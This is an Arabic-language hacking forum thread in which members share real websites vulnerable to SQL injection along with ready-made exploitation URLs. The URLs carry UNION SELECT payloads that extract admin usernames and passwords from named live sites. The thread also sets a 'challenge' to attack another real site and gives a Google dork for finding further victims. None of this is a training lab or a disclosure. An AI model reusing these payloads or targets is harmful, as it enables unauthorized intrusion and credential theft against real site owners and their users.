رد: ضع هنا اي موقع مصاب بثغرة sql +الاستغلال
و انا سوف ابدا
المستوى:
easy
قبل الاستغلال
www.claimscompensation.com/news.php?id=31
و بعد الاستغلال
http://www.claimscompensation.com/news.php?id=31+and+1=0+union+select+1,2,3,4,concat%28vUser,0x3a,vPassword%29%20%20,6,7,8,9,10+from+admin
السلام عليكم ورحمه الله
اخواني اعضاء العناكب الاحترافية
الموضوع هو محتوي عام عن المواقع المصابه بالـ sql او مواقع جاهزه بالاستغلال واليوزر والباسورد وبلاش مواضيع مثل موقع هدية نزل الموقع هنا ومتعملوش موضوع وتشوة شكل القسم
بختصار اي واحد يبي ينزل موقع مصاب يكون بهذا الموضوع
وهذا لعدم...
رد: {SQL}تحدي SQL
حقنة الموقع الثاني
والمعلومات تظهر اعلى المتصفح
32عمود العمود المصاب رقم 4
http://www.mshop.ir/detail.php?id=-302+union+select+1,2,3,group_concat%28id,0x3a,user,0x3a,pass%29%20,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user
حقنة الموقع الاول...
THIS IS THE CHALLENGE
Target
Code:
http://www.vedanta.edu.in/page.php?id=5
Level
Medium
Rules:
No Tools
No Blind
Don't Forget Rules 1,2
solvers list
1.
2.
3.
4.
5.
لاتضع الحل عند الرد
ارسل الحل برسالة خاصة
[1] أفتح google.com
[2] ابخث عن الدورك :- allinurl:=1+union+select+concat(username,(),password)from+users
[3] افتح النتيجة........!
Google made SQL injection Very simple..........!
تحياتيcode3
qya@live.fr